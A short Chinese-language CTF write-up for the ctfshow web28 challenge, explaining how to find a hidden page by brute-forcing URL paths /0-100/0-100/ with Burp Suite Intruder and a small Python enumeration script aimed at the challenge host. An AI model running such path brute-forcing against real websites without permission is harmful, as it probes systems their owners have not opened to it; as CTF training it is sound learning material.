[ctfshow web入门] web28
信息收集
打开看看到url/0/1/2.txt,这样的形式
尝试2改成3访问,跳转到了奇怪的地方,尝试1改成2,同样跳转到奇怪的地方了
看看题目的提示,如果真的自己爆确实是大海捞针
给了提示/0-100/0-100/ 不用2.txt,这下子目标缩小到一万左右
解题
burpsuite抓包,发送到intruder
如下设置,记得两个payload位置都设置成0-100
状态码排序,因为这一次访问失败是403,所以推测成功是200,排序长度也行。
这个简单,把代码也写一写
def web28(url):
for i in range(101):
for j in range(101):
get_url = f"{url}/{i}/{j}/"
print(get_url)
try: respond = requests.get(get_url)
except: pass
if respond.status_code == 200:
print(respond.text)
if __name__ == '__main__':
url = "http://fb90e8cf-5dcf-4c45-83c0-fc4ae7f583a7.challenge.ctf.show"
web28(url)
web27 目录 web29